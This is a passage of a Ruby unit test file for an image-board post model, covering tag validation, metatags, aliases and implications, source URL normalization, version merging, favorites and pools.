%W(___ ~foo _foo foo_ foo__bar foo*bar foo,bar foo\abar café 東方 new search).each do |tag|
build(:tag, name: tag).save(validate: false)
end
end
assert_invalid_tag("___")
assert_invalid_tag("~foo")
assert_invalid_tag("_foo")
assert_invalid_tag("foo_")
assert_invalid_tag("foo__bar")
assert_invalid_tag("foo*bar")
assert_invalid_tag("foo,bar")
assert_invalid_tag("foo\abar")
assert_invalid_tag("café")
assert_invalid_tag("東方")
assert_invalid_tag("new")
assert_invalid_tag("search")
end
end
context "tagged with a metatag" do
context "for typing a tag" do
  setup do
    @post = FactoryBot.create(:post, tag_string: "char:hoge")
    @tags = @post.tag_array
  end

  should "change the type" do
    # Failure message fixed: the tag under test is 'hoge', not 'moge'.
    assert(Tag.where(name: "hoge", category: 4).exists?, "expected 'hoge' tag to be created as a character")
  end
end
context "for typing an aliased tag" do
  setup do
    @alias = FactoryBot.create(:tag_alias, antecedent_name: "hoge", consequent_name: "moge")
    @post = FactoryBot.create(:post, tag_string: "char:hoge")
    @tags = @post.tag_array
  end

  should "change the type" do
    assert_equal(["moge"], @tags)
    # Failure messages fixed: 'moge' (the alias consequent) is checked as
    # category 0 (general), while the char: prefix applies to 'hoge'.
    assert(Tag.where(name: "moge", category: 0).exists?, "expected 'moge' tag to be created as a general tag")
    assert(Tag.where(name: "hoge", category: 4).exists?, "expected 'hoge' tag to be created as a character")
  end
end
context "for a wildcard implication" do
setup do
@post = FactoryBot.create(:post, tag_string: "char:someone_(cosplay) test_school_uniform")
@tags = @post.tag_array
end
should "add the cosplay tag" do
assert(@tags.include?("cosplay"))
end
should "add the school_uniform tag" do
assert(@tags.include?("school_uniform"))
end
should "create the tag" do
assert(Tag.where(name: "someone_(cosplay)").exists?, "expected 'someone_(cosplay)' tag to be created")
assert(Tag.where(name: "someone_(cosplay)", category: 4).exists?, "expected 'someone_(cosplay)' tag to be created as character")
assert(Tag.where(name: "someone", category: 4).exists?, "expected 'someone' tag to be created")
assert(Tag.where(name: "school_uniform", category: 0).exists?, "expected 'school_uniform' tag to be created")
end
should "apply aliases when the character tag is added" do
FactoryBot.create(:tag, name: "jim", category: Tag.categories.general)
FactoryBot.create(:tag, name: "james", category: Tag.categories.character)
FactoryBot.create(:tag_alias, antecedent_name: "jim", consequent_name: "james")
@post.add_tag("jim_(cosplay)")
@post.save
assert(@post.has_tag?("james"), "expected 'jim' to be aliased to 'james'")
end
should "apply implications after the character tag is added" do
FactoryBot.create(:tag, name: "jimmy", category: Tag.categories.character)
FactoryBot.create(:tag, name: "jim", category: Tag.categories.character)
FactoryBot.create(:tag_implication, antecedent_name: "jimmy", consequent_name: "jim")
@post.add_tag("jimmy_(cosplay)")
@post.save
assert(@post.has_tag?("jim"), "expected 'jimmy' to imply 'jim'")
end
end
context "for a parent" do
setup do
@parent = FactoryBot.create(:post)
end
should "update the parent relationships for both posts" do
@post.update(tag_string: "aaa parent:#{@parent.id}")
@post.reload
@parent.reload
assert_equal(@parent.id, @post.parent_id)
assert(@parent.has_children?)
end
should "not allow self-parenting" do
@post.update(:tag_string => "parent:#{@post.id}")
assert_nil(@post.parent_id)
end
should "clear the parent with parent:none" do
@post.update(:parent_id => @parent.id)
assert_equal(@parent.id, @post.parent_id)
@post.update(:tag_string => "parent:none")
assert_nil(@post.parent_id)
end
should "clear the parent with -parent:1234" do
@post.update(:parent_id => @parent.id)
assert_equal(@parent.id, @post.parent_id)
@post.update(:tag_string => "-parent:#{@parent.id}")
assert_nil(@post.parent_id)
end
end
context "for a favgroup" do
setup do
@favgroup = FactoryBot.create(:favorite_group, creator: @user)
@post = FactoryBot.create(:post, :tag_string => "aaa favgroup:#{@favgroup.id}")
end
should "add the post to the favgroup" do
assert_equal(1, @favgroup.reload.post_count)
assert_equal(true, @favgroup.contains?(@post.id))
end
should "remove the post from the favgroup" do
@post.update(:tag_string => "-favgroup:#{@favgroup.id}")
assert_equal(0, @favgroup.reload.post_count)
assert_equal(false, @favgroup.contains?(@post.id))
end
end
context "for a pool" do
setup do
mock_pool_archive_service!
start_pool_archive_transaction
end
teardown do
rollback_pool_archive_transaction
end
context "on creation" do
setup do
@pool = FactoryBot.create(:pool)
@post = FactoryBot.create(:post, :tag_string => "aaa pool:#{@pool.id}")
end
should "add the post to the pool" do
@post.reload
@pool.reload
assert_equal([@post.id], @pool.post_ids)
assert_equal("pool:#{@pool.id}", @post.pool_string)
end
end
context "negated" do
setup do
@pool = FactoryBot.create(:pool)
@post = FactoryBot.create(:post, :tag_string => "aaa")
@post.add_pool!(@pool)
@post.tag_string = "aaa -pool:#{@pool.id}"
@post.save
end
should "remove the post from the pool" do
@post.reload
@pool.reload
assert_equal([], @pool.post_ids)
assert_equal("", @post.pool_string)
end
end
context "id" do
setup do
@pool = FactoryBot.create(:pool)
@post.update(tag_string: "aaa pool:#{@pool.id}")
end
should "add the post to the pool" do
@post.reload
@pool.reload
assert_equal([@post.id], @pool.post_ids)
assert_equal("pool:#{@pool.id}", @post.pool_string)
end
end
context "name" do
context "that exists" do
setup do
@pool = FactoryBot.create(:pool, :name => "abc")
@post.update(tag_string: "aaa pool:abc")
end
should "add the post to the pool" do
@post.reload
@pool.reload
assert_equal([@post.id], @pool.post_ids)
assert_equal("pool:#{@pool.id}", @post.pool_string)
end
end
context "that doesn't exist" do
should "create a new pool and add the post to that pool" do
@post.update(tag_string: "aaa newpool:abc")
@pool = Pool.find_by_name("abc")
@post.reload
assert_not_nil(@pool)
assert_equal([@post.id], @pool.post_ids)
assert_equal("pool:#{@pool.id}", @post.pool_string)
end
end
context "with special characters" do
should "not strip '%' from the name" do
@post.update(tag_string: "aaa newpool:ichigo_100%")
assert(Pool.exists?(name: "ichigo_100%"))
end
end
end
end
context "for a rating" do
context "that is valid" do
should "update the rating if the post is unlocked" do
@post.update(tag_string: "aaa rating:e")
@post.reload
assert_equal("e", @post.rating)
end
end
context "that is invalid" do
should "not update the rating" do
@post.update(tag_string: "aaa rating:z")
@post.reload
assert_equal("q", @post.rating)
end
end
context "that is locked" do
should "change the rating if locked in the same update" do
@post.update(tag_string: "rating:e", is_rating_locked: true)
assert(@post.valid?)
assert_equal("e", @post.reload.rating)
end
should "not change the rating if locked previously" do
@post.is_rating_locked = true
@post.save
@post.update(:tag_string => "rating:e")
assert(@post.invalid?)
assert_not_equal("e", @post.reload.rating)
end
end
end
context "for a fav" do
  # The fav:self / -fav:self metatags toggle the current user's entry
  # in the post's fav_string.
  should "add/remove the current user to the post's favorite listing" do
    @post.update(tag_string: "aaa fav:self")
    assert_equal("fav:#{@user.id}", @post.fav_string)
    @post.update(tag_string: "aaa -fav:self")
    assert_equal("", @post.fav_string)
  end
end
context "for a child" do
should "add and remove children" do
@children = FactoryBot.create_list(:post, 3, parent_id: nil)
@post.update(tag_string: "aaa child:#{@children.first.id}..#{@children.last.id}")
assert_equal(true, @post.reload.has_children?)
assert_equal(@post.id, @children[0].reload.parent_id)
assert_equal(@post.id, @children[1].reload.parent_id)
assert_equal(@post.id, @children[2].reload.parent_id)
@post.update(tag_string: "aaa -child:#{@children.first.id}")
assert_equal(true, @post.reload.has_children?)
assert_nil(@children[0].reload.parent_id)
assert_equal(@post.id, @children[1].reload.parent_id)
assert_equal(@post.id, @children[2].reload.parent_id)
@post.update(tag_string: "aaa child:none")
assert_equal(false, @post.reload.has_children?)
assert_nil(@children[0].reload.parent_id)
assert_nil(@children[1].reload.parent_id)
assert_nil(@children[2].reload.parent_id)
end
end
context "for a source" do
should "set the source with source:foo_bar_baz" do
@post.update(:tag_string => "source:foo_bar_baz")
assert_equal("foo_bar_baz", @post.source)
end
should 'set the source with source:"foo bar baz"' do
@post.update(:tag_string => 'source:"foo bar baz"')
assert_equal("foo bar baz", @post.source)
end
should 'strip the source with source:" foo bar baz "' do
@post.update(:tag_string => 'source:" foo bar baz "')
assert_equal("foo bar baz", @post.source)
end
should "clear the source with source:none" do
@post.update(:source => "foobar")
@post.update(:tag_string => "source:none")
assert_equal("", @post.source)
end
should "set the pixiv id with source:https://img18.pixiv.net/img/evazion/14901720.png" do
@post.update(:tag_string => "source:https://img18.pixiv.net/img/evazion/14901720.png")
assert_equal(14901720, @post.pixiv_id)
end
end
context "of" do
setup do
@builder = FactoryBot.create(:builder_user)
end
context "locked:notes" do
context "by a member" do
should "not lock the notes" do
@post.update(:tag_string => "locked:notes")
assert_equal(false, @post.is_note_locked)
end
end
context "by a builder" do
should "lock/unlock the notes" do
CurrentUser.scoped(@builder) do
@post.update(:tag_string => "locked:notes")
assert_equal(true, @post.is_note_locked)
@post.update(:tag_string => "-locked:notes")
assert_equal(false, @post.is_note_locked)
end
end
end
end
context "locked:rating" do
context "by a member" do
should "not lock the rating" do
@post.update(:tag_string => "locked:rating")
assert_equal(false, @post.is_rating_locked)
end
end
context "by a builder" do
should "lock/unlock the rating" do
CurrentUser.scoped(@builder) do
@post.update(:tag_string => "locked:rating")
assert_equal(true, @post.is_rating_locked)
@post.update(:tag_string => "-locked:rating")
assert_equal(false, @post.is_rating_locked)
end
end
end
end
context "locked:status" do
context "by a member" do
should "not lock the status" do
@post.update(:tag_string => "locked:status")
assert_equal(false, @post.is_status_locked)
end
end
context "by an admin" do
should "lock/unlock the status" do
CurrentUser.scoped(FactoryBot.create(:admin_user)) do
@post.update(:tag_string => "locked:status")
assert_equal(true, @post.is_status_locked)
@post.update(:tag_string => "-locked:status")
assert_equal(false, @post.is_status_locked)
end
end
end
end
end
context "of" do
setup do
@gold = FactoryBot.create(:gold_user)
end
context "upvote:self or downvote:self" do
context "by a member" do
should "not upvote the post" do
assert_raises PostVote::Error do
@post.update(:tag_string => "upvote:self")
end
assert_equal(0, @post.score)
end
should "not downvote the post" do
assert_raises PostVote::Error do
@post.update(:tag_string => "downvote:self")
end
assert_equal(0, @post.score)
end
end
context "by a gold user" do
should "upvote the post" do
CurrentUser.scoped(FactoryBot.create(:gold_user)) do
@post.update(:tag_string => "tag1 tag2 upvote:self")
assert_equal(false, @post.errors.any?)
assert_equal(1, @post.score)
end
end
should "downvote the post" do
CurrentUser.scoped(FactoryBot.create(:gold_user)) do
@post.update(:tag_string => "tag1 tag2 downvote:self")
assert_equal(false, @post.errors.any?)
assert_equal(-1, @post.score)
end
end
end
end
end
end
context "tagged with a negated tag" do
should "remove the tag if present" do
@post.update(tag_string: "aaa bbb ccc")
@post.update(tag_string: "aaa bbb ccc -bbb")
@post.reload
assert_equal("aaa ccc", @post.tag_string)
end
should "resolve aliases" do
FactoryBot.create(:tag_alias, :antecedent_name => "/tr", :consequent_name => "translation_request")
@post.update(:tag_string => "aaa translation_request -/tr")
assert_equal("aaa", @post.tag_string)
end
end
context "tagged with animated_gif or animated_png" do
  should "remove the tag if not a gif or png" do
    # Both automatic tags are stripped when the file type doesn't match.
    %w[animated_gif animated_png].each do |automatic_tag|
      @post.update(tag_string: "tagme #{automatic_tag}")
      assert_equal("tagme", @post.tag_string)
    end
  end
end
should "have an array representation of its tags" do
  post = FactoryBot.create(:post)
  post.reload
  post.set_tag_string("aaa bbb")
  assert_equal(%w(aaa bbb), post.tag_array)
  # tag_array_was reflects the persisted value — presumably "tag1 tag2"
  # comes from the post factory's default tag string; confirm against the factory.
  assert_equal(%w(tag1 tag2), post.tag_array_was)
end
context "with large dimensions" do
setup do
@post.image_width = 10_000
@post.image_height = 10
@post.tag_string = ""
@post.save
end
should "have the appropriate dimension tags added automatically" do
assert_match(/incredibly_absurdres/, @post.tag_string)
assert_match(/absurdres/, @post.tag_string)
assert_match(/highres/, @post.tag_string)
end
end
context "with a large file size" do
setup do
@post.file_size = 11.megabytes
@post.tag_string = ""
@post.save
end
should "have the appropriate file size tags added automatically" do
assert_match(/huge_filesize/, @post.tag_string)
end
end
context "with a .zip file extension" do
setup do
@post.file_ext = "zip"
@post.tag_string = ""
@post.save
end
should "have the appropriate file type tag added automatically" do
assert_match(/ugoira/, @post.tag_string)
end
end
context "with a .webm file extension" do
setup do
FactoryBot.create(:tag_implication, antecedent_name: "webm", consequent_name: "animated")
@post.file_ext = "webm"
@post.tag_string = ""
@post.save
end
should "have the appropriate file type tag added automatically" do
assert_match(/webm/, @post.tag_string)
end
should "apply implications after adding the file type tag" do
assert(@post.has_tag?("animated"), "expected 'webm' to imply 'animated'")
end
end
context "with a .swf file extension" do
setup do
@post.file_ext = "swf"
@post.tag_string = ""
@post.save
end
should "have the appropriate file type tag added automatically" do
assert_match(/flash/, @post.tag_string)
end
end
context "with *_(cosplay) tags" do
should "add the character tags and the cosplay tag" do
@post.add_tag("hakurei_reimu_(cosplay)")
@post.add_tag("hatsune_miku_(cosplay)")
@post.save
assert(@post.has_tag?("hakurei_reimu"))
assert(@post.has_tag?("hatsune_miku"))
assert(@post.has_tag?("cosplay"))
end
should "not add the _(cosplay) tag if it conflicts with an existing tag" do
create(:tag, name: "little_red_riding_hood", category: Tag.categories.copyright)
@post = create(:post, tag_string: "little_red_riding_hood_(cosplay)")
refute(@post.has_tag?("little_red_riding_hood"))
refute(@post.has_tag?("cosplay"))
assert(@post.warnings[:base].grep(/Couldn't add tag/).present?)
end
end
context "that has been updated" do
should "create a new version if it's the first version" do
assert_difference("PostArchive.count", 1) do
post = FactoryBot.create(:post)
end
end
should "create a new version if it's been over an hour since the last update" do
post = FactoryBot.create(:post)
travel(6.hours) do
assert_difference("PostArchive.count", 1) do
post.update(tag_string: "zzz")
end
end
end
should "merge with the previous version if the updater is the same user and it's been less than an hour" do
post = FactoryBot.create(:post)
assert_difference("PostArchive.count", 0) do
post.update(tag_string: "zzz")
end
assert_equal("zzz", post.versions.last.tags)
end
should "increment the updater's post_update_count" do
  PostArchive.sqs_service.stubs(:merge?).returns(false)
  post = FactoryBot.create(:post, :tag_string => "aaa bbb ccc")
  # XXX in the test environment the update count gets bumped twice:
  # once by Post#post_update_count, and once by the counter cache. In
  # production the counter cache doesn't bump the count, because
  # versions are created on a separate server.
  assert_difference("CurrentUser.user.reload.post_update_count", 2) do
    post.update(tag_string: "zzz")
  end
end
should "reset its tag array cache" do
  post = FactoryBot.create(:post, :tag_string => "aaa bbb ccc")
  assert_equal(%w(aaa bbb ccc), post.tag_array)
  # Assigning a new tag string must invalidate the memoized tag array.
  # (Removed an unused `user` local and a duplicated assignment line.)
  post.tag_string = "ddd eee fff"
  post.save
  assert_equal("ddd eee fff", post.tag_string)
  assert_equal(%w(ddd eee fff), post.tag_array)
end
should "create the actual tag records" do
assert_difference("Tag.count", 3) do
post = FactoryBot.create(:post, :tag_string => "aaa bbb ccc")
end
end
should "update the post counts of relevant tag records" do
post1 = FactoryBot.create(:post, :tag_string => "aaa bbb ccc")
post2 = FactoryBot.create(:post, :tag_string => "bbb ccc ddd")
post3 = FactoryBot.create(:post, :tag_string => "ccc ddd eee")
assert_equal(1, Tag.find_by_name("aaa").post_count)
assert_equal(2, Tag.find_by_name("bbb").post_count)
assert_equal(3, Tag.find_by_name("ccc").post_count)
post3.reload
post3.tag_string = "xxx"
post3.save
assert_equal(1, Tag.find_by_name("aaa").post_count)
assert_equal(2, Tag.find_by_name("bbb").post_count)
assert_equal(2, Tag.find_by_name("ccc").post_count)
assert_equal(1, Tag.find_by_name("ddd").post_count)
assert_equal(0, Tag.find_by_name("eee").post_count)
assert_equal(1, Tag.find_by_name("xxx").post_count)
end
should "update its tag counts" do
artist_tag = FactoryBot.create(:artist_tag)
copyright_tag = FactoryBot.create(:copyright_tag)
general_tag = FactoryBot.create(:tag)
new_post = FactoryBot.create(:post, :tag_string => "#{artist_tag.name} #{copyright_tag.name} #{general_tag.name}")
assert_equal(1, new_post.tag_count_artist)
assert_equal(1, new_post.tag_count_copyright)
assert_equal(1, new_post.tag_count_general)
assert_equal(0, new_post.tag_count_character)
assert_equal(3, new_post.tag_count)
new_post.tag_string = "babs"
new_post.save
assert_equal(0, new_post.tag_count_artist)
assert_equal(0, new_post.tag_count_copyright)
assert_equal(1, new_post.tag_count_general)
assert_equal(0, new_post.tag_count_character)
assert_equal(1, new_post.tag_count)
end
should "merge any tag changes that were made after loading the initial set of tags part 1" do
post = FactoryBot.create(:post, :tag_string => "aaa bbb ccc")
# user a adds <ddd>
post_edited_by_user_a = Post.find(post.id)
post_edited_by_user_a.old_tag_string = "aaa bbb ccc"
post_edited_by_user_a.tag_string = "aaa bbb ccc ddd"
post_edited_by_user_a.save
# user b removes <ccc> adds <eee>
post_edited_by_user_b = Post.find(post.id)
post_edited_by_user_b.old_tag_string = "aaa bbb ccc"
post_edited_by_user_b.tag_string = "aaa bbb eee"
post_edited_by_user_b.save
# final should be <aaa>, <bbb>, <ddd>, <eee>
final_post = Post.find(post.id)
assert_equal(%w(aaa bbb ddd eee), Tag.scan_tags(final_post.tag_string).sort)
end
should "merge any tag changes that were made after loading the initial set of tags part 2" do
# This is the same as part 1, only the order of operations is reversed.
# The results should be the same.
post = FactoryBot.create(:post, :tag_string => "aaa bbb ccc")
# user a removes <ccc> adds <eee>
post_edited_by_user_a = Post.find(post.id)
post_edited_by_user_a.old_tag_string = "aaa bbb ccc"
post_edited_by_user_a.tag_string = "aaa bbb eee"
post_edited_by_user_a.save
# user b adds <ddd>
post_edited_by_user_b = Post.find(post.id)
post_edited_by_user_b.old_tag_string = "aaa bbb ccc"
post_edited_by_user_b.tag_string = "aaa bbb ccc ddd"
post_edited_by_user_b.save
# final should be <aaa>, <bbb>, <ddd>, <eee>
final_post = Post.find(post.id)
assert_equal(%w(aaa bbb ddd eee), Tag.scan_tags(final_post.tag_string).sort)
end
should "merge any parent, source, and rating changes that were made after loading the initial set" do
post = FactoryBot.create(:post, :parent => nil, :source => "", :rating => "q")
parent_post = FactoryBot.create(:post)
# user a changes rating to safe, adds parent
post_edited_by_user_a = Post.find(post.id)
post_edited_by_user_a.old_parent_id = ""
post_edited_by_user_a.old_source = ""
post_edited_by_user_a.old_rating = "q"
post_edited_by_user_a.parent_id = parent_post.id
post_edited_by_user_a.source = nil
post_edited_by_user_a.rating = "s"
post_edited_by_user_a.save
# user b adds source
post_edited_by_user_b = Post.find(post.id)
post_edited_by_user_b.old_parent_id = ""
post_edited_by_user_b.old_source = ""
post_edited_by_user_b.old_rating = "q"
post_edited_by_user_b.parent_id = nil
post_edited_by_user_b.source = "http://example.com"
post_edited_by_user_b.rating = "q"
post_edited_by_user_b.save
# final post should be rated safe and have the set parent and source
final_post = Post.find(post.id)
assert_equal(parent_post.id, final_post.parent_id)
assert_equal("http://example.com", final_post.source)
assert_equal("s", final_post.rating)
end
end
context "that has been tagged with a metatag" do
should "not include the metatag in its tag string" do
post = FactoryBot.create(:post)
post.tag_string = "aaa pool:1234 pool:test rating:s fav:bob"
post.save
assert_equal("aaa", post.tag_string)
end
end
context "with a source" do
context "that is not from pixiv" do
should "clear the pixiv id" do
@post.pixiv_id = 1234
@post.update(source: "http://fc06.deviantart.net/fs71/f/2013/295/d/7/you_are_already_dead__by_mar11co-d6rgm0e.jpg")
assert_nil(@post.pixiv_id)
@post.pixiv_id = 1234
@post.update(source: "http://pictures.hentai-foundry.com//a/AnimeFlux/219123.jpg")
assert_nil(@post.pixiv_id)
end
end
context "that is from pixiv" do
should "save the pixiv id" do
@post.update(source: "http://i1.pixiv.net/img-original/img/2014/10/02/13/51/23/46304396_p0.png")
assert_equal(46304396, @post.pixiv_id)
@post.pixiv_id = nil
end
end
should "normalize pixiv links" do
@post.update!(source: "http://i2.pixiv.net/img12/img/zenze/39749565.png")
assert_equal("https://www.pixiv.net/artworks/39749565", @post.normalized_source)
@post.update!(source: "http://i1.pixiv.net/img53/img/themare/39735353_big_p1.jpg")
assert_equal("https://www.pixiv.net/artworks/39735353", @post.normalized_source)
@post.update!(source: "http://i1.pixiv.net/c/150x150/img-master/img/2010/11/30/08/39/58/14901720_p0_master1200.jpg")
assert_equal("https://www.pixiv.net/artworks/14901720", @post.normalized_source)
@post.update!(source: "http://i1.pixiv.net/img-original/img/2010/11/30/08/39/58/14901720_p0.png")
assert_equal("https://www.pixiv.net/artworks/14901720", @post.normalized_source)
@post.update!(source: "http://i2.pixiv.net/img-zip-ugoira/img/2014/08/05/06/01/10/44524589_ugoira1920x1080.zip")
assert_equal("https://www.pixiv.net/artworks/44524589", @post.normalized_source)
end
should "normalize nicoseiga links" do
@post.source = "http://lohas.nicoseiga.jp/priv/3521156?e=1382558156&h=f2e089256abd1d453a455ec8f317a6c703e2cedf"
assert_equal("https://seiga.nicovideo.jp/seiga/im3521156", @post.normalized_source)
@post.source = "http://lohas.nicoseiga.jp/priv/b80f86c0d8591b217e7513a9e175e94e00f3c7a1/1384936074/3583893"
assert_equal("https://seiga.nicovideo.jp/seiga/im3583893", @post.normalized_source)
end
should "normalize twitpic links" do
@post.source = "http://d3j5vwomefv46c.cloudfront.net/photos/large/820960031.jpg?1384107199"
assert_equal("https://twitpic.com/dks0tb", @post.normalized_source)
end
should "normalize deviantart links" do
@post.source = "http://fc06.deviantart.net/fs71/f/2013/295/d/7/you_are_already_dead__by_mar11co-d6rgm0e.jpg"
assert_equal("https://www.deviantart.com/mar11co/art/You-Are-Already-Dead-408921710", @post.normalized_source)
@post.source = "http://fc00.deviantart.net/fs71/f/2013/337/3/5/35081351f62b432f84eaeddeb4693caf-d6wlrqs.jpg"
assert_equal("https://deviantart.com/deviation/417560500", @post.normalized_source)
end
should "normalize karabako links" do
@post.source = "http://www.karabako.net/images/karabako_38835.jpg"
assert_equal("http://www.karabako.net/post/view/38835", @post.normalized_source)
end
should "normalize twipple links" do
@post.source = "http://p.twpl.jp/show/orig/mI2c3"
assert_equal("http://p.twipple.jp/mI2c3", @post.normalized_source)
end
should "normalize hentai foundry links" do
@post.source = "http://pictures.hentai-foundry.com//a/AnimeFlux/219123.jpg"
assert_equal("https://www.hentai-foundry.com/pictures/user/AnimeFlux/219123", @post.normalized_source)
@post.source = "http://pictures.hentai-foundry.com/a/AnimeFlux/219123/Mobile-Suit-Equestria-rainbow-run.jpg"
assert_equal("https://www.hentai-foundry.com/pictures/user/AnimeFlux/219123", @post.normalized_source)
end
end
context "when validating tags" do
  should "warn when creating a new general tag" do
    @post.add_tag("tag")
    @post.save
    assert_match(/Created 1 new tag: \[\[tag\]\]/, @post.warnings.full_messages.join)
  end

  should "warn when adding an artist tag without an artist entry" do
    @post.add_tag("artist:bkub")
    @post.save
    assert_match(/Artist \[\[bkub\]\] requires an artist entry./, @post.warnings.full_messages.join)
  end

  should "warn when a tag removal failed due to implications or automatic tags" do
    # "cat" implies "animal"; removing "cosplay" (and implicitly "animal")
    # should be refused with a warning naming both tags.
    # NOTE(review): the local `ti` is never used; the create call is kept
    # for its side effect of installing the implication.
    ti = FactoryBot.create(:tag_implication, antecedent_name: "cat", consequent_name: "animal")
    @post.reload
    @post.update(old_tag_string: @post.tag_string, tag_string: "chen_(cosplay) char:chen cosplay cat animal")
    @post.warnings.clear
    @post.reload
    @post.update(old_tag_string: @post.tag_string, tag_string: "chen_(cosplay) chen cosplay cat -cosplay")
    assert_match(/\[\[animal\]\] and \[\[cosplay\]\] could not be removed./, @post.warnings.full_messages.join)
  end

  should "warn when a post from a known source is missing an artist tag" do
    post = FactoryBot.build(:post, source: "https://www.pixiv.net/member_illust.php?mode=medium&illust_id=65985331")
    post.save
    assert_match(/Artist tag is required/, post.warnings.full_messages.join)
  end

  should "warn when missing a copyright tag" do
    assert_match(/Copyright tag is required/, @post.warnings.full_messages.join)
  end

  should "warn when an upload doesn't have enough tags" do
    post = FactoryBot.create(:post, tag_string: "tagme")
    assert_match(/Uploads must have at least \d+ general tags/, post.warnings.full_messages.join)
  end
end
end
end
context "Updating:" do
  context "an existing post" do
    setup { @post = FactoryBot.create(:post) }

    should "call Tag.increment_post_counts with the correct params" do
      @post.reload
      # Only the newly added tag ("abc") gets its count incremented;
      # pre-existing tags are untouched.
      Tag.expects(:increment_post_counts).once.with(["abc"])
      @post.update(tag_string: "tag1 abc")
    end
  end

  context "A rating unlocked post" do
    setup { @post = FactoryBot.create(:post) }
    subject { @post }

    # Ratings are stored as single lowercase letters; anything else is invalid.
    should "not allow values S, safe, derp" do
      ["S", "safe", "derp"].each do |rating|
        subject.rating = rating
        assert(!subject.valid?)
      end
    end

    should "allow values s, q, e" do
      ["s", "q", "e"].each do |rating|
        subject.rating = rating
        assert(subject.valid?)
      end
    end
  end

  context "A rating locked post" do
    setup { @post = FactoryBot.create(:post, :is_rating_locked => true) }
    subject { @post }

    should "not allow values S, safe, derp" do
      ["S", "safe", "derp"].each do |rating|
        subject.rating = rating
        assert(!subject.valid?)
      end
    end

    # A locked rating rejects even otherwise-valid new values.
    should "not allow values s, e" do
      ["s", "e"].each do |rating|
        subject.rating = rating
        assert(!subject.valid?)
      end
    end
  end
end
context "Favorites:" do
  context "Removing a post from a user's favorites" do
    setup do
      @user = FactoryBot.create(:contributor_user)
      @post = FactoryBot.create(:post)
      @post.add_favorite!(@user)
      @user.reload
    end

    should "decrement the user's favorite_count" do
      assert_difference("@user.favorite_count", -1) do
        @post.remove_favorite!(@user)
      end
    end

    should "decrement the post's score for gold users" do
      assert_difference("@post.score", -1) do
        @post.remove_favorite!(@user)
      end
    end

    should "not decrement the post's score for basic users" do
      # Basic members' favorites don't affect score in either direction.
      @member = FactoryBot.create(:user)
      assert_no_difference("@post.score") { @post.add_favorite!(@member) }
      assert_no_difference("@post.score") { @post.remove_favorite!(@member) }
    end

    should "not decrement the user's favorite_count if the user did not favorite the post" do
      @post2 = FactoryBot.create(:post)
      assert_no_difference("@user.favorite_count") do
        @post2.remove_favorite!(@user)
      end
    end
  end

  context "Adding a post to a user's favorites" do
    setup do
      @user = FactoryBot.create(:contributor_user)
      @post = FactoryBot.create(:post)
    end

    should "periodically clean the fav_string" do
      # Seed a corrupted fav_string with duplicates, force the cleanup path,
      # and verify duplicates collapse and fav_count is corrected.
      @post.update_column(:fav_string, "fav:1 fav:1 fav:1")
      @post.update_column(:fav_count, 3)
      @post.stubs(:clean_fav_string?).returns(true)
      @post.append_user_to_fav_string(2)
      assert_equal("fav:1 fav:2", @post.fav_string)
      assert_equal(2, @post.fav_count)
    end

    should "increment the user's favorite_count" do
      assert_difference("@user.favorite_count", 1) do
        @post.add_favorite!(@user)
      end
    end

    should "increment the post's score for gold users" do
      @post.add_favorite!(@user)
      assert_equal(1, @post.score)
    end

    should "not increment the post's score for basic users" do
      @member = FactoryBot.create(:user)
      @post.add_favorite!(@member)
      assert_equal(0, @post.score)
    end

    should "update the fav strings on the post" do
      @post.add_favorite!(@user)
      @post.reload
      assert_equal("fav:#{@user.id}", @post.fav_string)
      assert(Favorite.exists?(:user_id => @user.id, :post_id => @post.id))

      # Favoriting twice raises and leaves the fav_string unchanged.
      assert_raises(Favorite::Error) { @post.add_favorite!(@user) }
      @post.reload
      assert_equal("fav:#{@user.id}", @post.fav_string)
      assert(Favorite.exists?(:user_id => @user.id, :post_id => @post.id))

      @post.remove_favorite!(@user)
      @post.reload
      assert_equal("", @post.fav_string)
      assert(!Favorite.exists?(:user_id => @user.id, :post_id => @post.id))

      # Unfavoriting twice is a silent no-op rather than an error.
      @post.remove_favorite!(@user)
      @post.reload
      assert_equal("", @post.fav_string)
      assert(!Favorite.exists?(:user_id => @user.id, :post_id => @post.id))
    end
  end

  context "Moving favorites to a parent post" do
    setup do
      @parent = FactoryBot.create(:post)
      @child = FactoryBot.create(:post, parent: @parent)

      @user1 = FactoryBot.create(:user, enable_private_favorites: true)
      @gold1 = FactoryBot.create(:gold_user)
      @supervoter1 = FactoryBot.create(:user, is_super_voter: true)

      @child.add_favorite!(@user1)
      @child.add_favorite!(@gold1)
      @child.add_favorite!(@supervoter1)
      # The supervoter already favorited the parent, so the transfer must
      # not double-count them.
      @parent.add_favorite!(@supervoter1)

      @child.give_favorites_to_parent
      @child.reload
      @parent.reload
    end

    should "move the favorites" do
      assert_equal(0, @child.fav_count)
      assert_equal(0, @child.favorites.count)
      assert_equal("", @child.fav_string)
      assert_equal([], @child.favorites.pluck(:user_id))

      assert_equal(3, @parent.fav_count)
      assert_equal(3, @parent.favorites.count)
    end

    should "create a vote for each user who can vote" do
      assert(@parent.votes.where(user: @gold1).exists?)
      assert(@parent.votes.where(user: @supervoter1).exists?)
      # NOTE(review): the expected score of 4 presumably equals the super
      # voter's vote magnitude plus the gold user's vote — confirm against
      # SuperVoter::MAGNITUDE.
      assert_equal(4, @parent.score)
    end
  end
end
context "Pools:" do
  setup do
    # Pool updates enqueue SQS messages; stub out the external service call.
    SqsService.any_instance.stubs(:send_message)
  end

  context "Removing a post from a pool" do
    should "update the post's pool string" do
      post = FactoryBot.create(:post)
      pool = FactoryBot.create(:pool)
      post.add_pool!(pool)
      post.remove_pool!(pool)
      post.reload
      assert_equal("", post.pool_string)

      # Removing again is a no-op.
      post.remove_pool!(pool)
      post.reload
      assert_equal("", post.pool_string)
    end
  end

  context "Adding a post to a pool" do
    should "update the post's pool string" do
      post = FactoryBot.create(:post)
      pool = FactoryBot.create(:pool)
      post.add_pool!(pool)
      post.reload
      assert_equal("pool:#{pool.id}", post.pool_string)

      # Adding again must not duplicate the entry.
      post.add_pool!(pool)
      post.reload
      assert_equal("pool:#{pool.id}", post.pool_string)

      post.remove_pool!(pool)
      post.reload
      assert_equal("", post.pool_string)
    end
  end
end
context "Uploading:" do
  context "Uploading a post" do
    should "capture who uploaded the post" do
      # The uploader can be assigned either as a record or by id; both must
      # stick and agree.
      post = FactoryBot.create(:post)
      user1 = FactoryBot.create(:user)
      user2 = FactoryBot.create(:user)

      post.uploader = user1
      assert_equal(user1.id, post.uploader_id)

      post.uploader_id = user2.id
      assert_equal(user2.id, post.uploader_id)
      assert_equal(user2.name, post.uploader.name)
    end

    context "tag post counts" do
      setup { @post = FactoryBot.build(:post) }

